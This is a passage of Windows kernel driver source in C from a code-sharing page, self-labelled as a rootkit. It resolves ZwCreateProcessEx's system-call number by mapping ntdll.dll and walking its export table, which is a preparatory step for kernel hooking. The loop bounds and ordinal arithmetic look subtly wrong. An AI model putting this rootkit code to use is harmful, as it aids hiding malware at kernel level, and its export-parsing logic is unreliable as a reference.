📄 783.html
字号:
ULONG StackZeroBits; <br />
ULONG StackReserved; <br />
ULONG StackCommit; <br />
ULONG ImageSubsystem; <br />
WORD SubsystemVersionLow; <br />
WORD SubsystemVersionHigh; <br />
ULONG Unknown1; <br />
ULONG ImageCharacteristics; <br />
ULONG ImageMachineType; <br />
ULONG Unknown2[3];<br />
} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;<br />
<br />
DWORD GetDllFunctionAddress(char* lpFunctionName, PUNICODE_STRING pDllName) <br />
{<br />
HANDLE hThread, hSection, hFile, hMod;<br />
SECTION_IMAGE_INFORMATION sii;<br />
IMAGE_DOS_HEADER* dosheader;<br />
IMAGE_OPTIONAL_HEADER* opthdr;<br />
IMAGE_EXPORT_DIRECTORY* pExportTable;<br />
DWORD* arrayOfFunctionAddresses;<br />
DWORD* arrayOfFunctionNames;<br />
WORD* arrayOfFunctionOrdinals;<br />
DWORD functionOrdinal;<br />
DWORD Base, x, functionAddress;<br />
char* functionName;<br />
STRING ntFunctionName, ntFunctionNameSearch;<br />
PVOID BaseAddress = NULL;<br />
SIZE_T size=0;<br />
<br />
OBJECT_ATTRIBUTES oa = {sizeof oa, 0, pDllName, OBJ_CASE_INSENSITIVE};<br />
<br />
IO_STATUS_BLOCK iosb;<br />
<br />
//_asm int 3;<br />
ZwOpenFile(&hFile, FILE_EXECUTE | SYNCHRONIZE, &oa, &iosb, FILE_SHARE_READ, FILE_SYNCHRONOUS_IO_NONALERT);<br />
<br />
oa.ObjectName = 0;<br />
<br />
ZwCreateSection(&hSection, SECTION_ALL_ACCESS, &oa, 0,PAGE_EXECUTE, SEC_IMAGE, hFile);<br />
<br />
ZwMapViewOfSection(hSection, NtCurrentProcess(), &BaseAddress, 0, 1000, 0, &size, (SECTION_INHERIT)1, MEM_TOP_DOWN, PAGE_READWRITE); <br />
<br />
ZwClose(hFile);<br />
<br />
hMod = BaseAddress;<br />
<br />
dosheader = (IMAGE_DOS_HEADER *)hMod;<br />
<br />
opthdr =(IMAGE_OPTIONAL_HEADER *) ((BYTE*)hMod+dosheader->e_lfanew+24);<br />
<br />
pExportTable =(IMAGE_EXPORT_DIRECTORY*)((BYTE*) hMod + opthdr->DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT]. VirtualAddress);<br />
<br />
// now we can get the exported functions, but note we convert from RVA to address<br />
arrayOfFunctionAddresses = (DWORD*)( (BYTE*)hMod + pExportTable->AddressOfFunctions);<br />
<br />
arrayOfFunctionNames = (DWORD*)( (BYTE*)hMod + pExportTable->AddressOfNames);<br />
<br />
arrayOfFunctionOrdinals = (WORD*)( (BYTE*)hMod + pExportTable->AddressOfNameOrdinals);<br />
<br />
Base = pExportTable->Base;<br />
<br />
RtlInitString(&ntFunctionNameSearch, lpFunctionName);<br />
<br />
for(x = 0; x < pExportTable->NumberOfFunctions; x++)<br />
{<br />
functionName = (char*)( (BYTE*)hMod + arrayOfFunctionNames[x]);<br />
<br />
RtlInitString(&ntFunctionName, functionName);<br />
<br />
functionOrdinal = arrayOfFunctionOrdinals[x] + Base - 1; // always need to add base, -1 as array counts from 0<br />
// this is the funny bit. you would expect the function pointer to simply be arrayOfFunctionAddresses[x]...<br />
// oh no... thats too simple. it is actually arrayOfFunctionAddresses[functionOrdinal]!!<br />
functionAddress = (DWORD)( (BYTE*)hMod + arrayOfFunctionAddresses[functionOrdinal]);<br />
if (RtlCompareString(&ntFunctionName, &ntFunctionNameSearch, TRUE) == 0) <br />
{<br />
ZwClose(hSection);<br />
return functionAddress;<br />
}<br />
}<br />
<br />
ZwClose(hSection);<br />
return 0;<br />
}<br />
<br />
NTSTATUS<br />
OnStubDispatch(<br />
IN PDEVICE_OBJECT DeviceObject,<br />
IN PIRP Irp<br />
)<br />
{<br />
Irp->IoStatus.Status = STATUS_SUCCESS;<br />
IoCompleteRequest (Irp,<br />
IO_NO_INCREMENT<br />
);<br />
return Irp->IoStatus.Status;<br />
}<br />
<br />
VOID OnUnload( IN PDRIVER_OBJECT DriverObject )<br />
{<br />
DbgPrint("ROOTKIT: OnUnload called\n");<br />
}<br />
<br />
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )<br />
{<br />
int i;<br />
UNICODE_STRING dllName;<br />
DWORD functionAddress;<br />
int position;<br />
DbgPrint("My Driver Loaded!");<br />
theDriverObject->DriverUnload = OnUnload; <br />
RtlInitUnicodeString(&dllName, L"\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll");<br />
functionAddress = GetDllFunctionAddress("ZwCreateProcessEx", &dllName);<br />
position = *((WORD*)(functionAddress+1));<br />
<br />
DbgPrint("Id:%d\n", position);<br />
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -